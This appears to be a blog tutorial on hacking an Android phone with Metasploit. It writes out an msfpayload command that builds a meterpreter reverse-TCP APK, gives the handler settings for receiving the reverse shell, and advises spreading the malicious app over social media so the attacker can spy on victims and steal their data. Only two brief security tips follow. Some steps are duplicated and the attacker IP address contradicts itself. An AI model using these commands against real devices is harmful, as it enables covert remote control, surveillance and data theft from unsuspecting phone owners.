To Hack Android Phone Using Metasploit 2017 And How To Secure?
1) The IP of the attacker: 192.168.8.94 (lets assume in my case.)
2) Attacker will need a port for receiving connection from other's system: 443
What Is Your Requirements:
1. First you need Metasploit framework ,(In this tutorial we are going to use Kali Linux 1.0.6 ),if you have not install kali in your system then search for this tutorial on this site.2. Obviously you need a Android device (we use LG android 4.4 KitKat)
Step By Step Hacking Android Smartphone Tutorial Using Metasploit:
Step:1) First of all simply Open terminal if you don't know how simply press CTRL + ALT + T
Step:2) After that you'll need to utilize the Metasploit payload framework by using below given code.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
Here make sure that you need to enter attacker IP address and here we considered ip as 182.158.18.67 (this is the static ip of attacker not dyanamic), if you don't understand please see beelow picture
Step:3) Now goto your console if you don't know how to go to consol window simply Type msfconsole.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
step:4) After doing this The next step is you'll need to configure the switch for the Metasploit payload.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
step:4) After doing this The next step is you'll need to configure the switch for the Metasploit payload.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
Step:5) NOw in this way attacker get a apk file or we can say malicious apk file and he need to only start distributing it via any medium for example facebook,whatsapp twitter etc.
Step:6) Now suppose i am the victim and download that malicious application and install it in my phone.And after my installation process attacker Metasploit console get something about me like this:
Step:7) The mean of above given screen is ,attacker hack your phone successfully and he will be able to get enough data from your smartphone ,It's mean attacker can do everything with your mobile he can spy on you ,steal your sensitive data become very easy task for him.
Step:6) Now suppose i am the victim and download that malicious application and install it in my phone.And after my installation process attacker Metasploit console get something about me like this:
Step:7) The mean of above given screen is ,attacker hack your phone successfully and he will be able to get enough data from your smartphone ,It's mean attacker can do everything with your mobile he can spy on you ,steal your sensitive data become very easy task for him.
Security Tips:
- 1. Don't install APK's from the unknown source.Always prefer google play store.But sometime google also not able to determine which one is good for your smartphone or not.
- 2.Disable unknown source installation from the setting.If you dont know how to block unknown source do mail me.
Comments
Post a Comment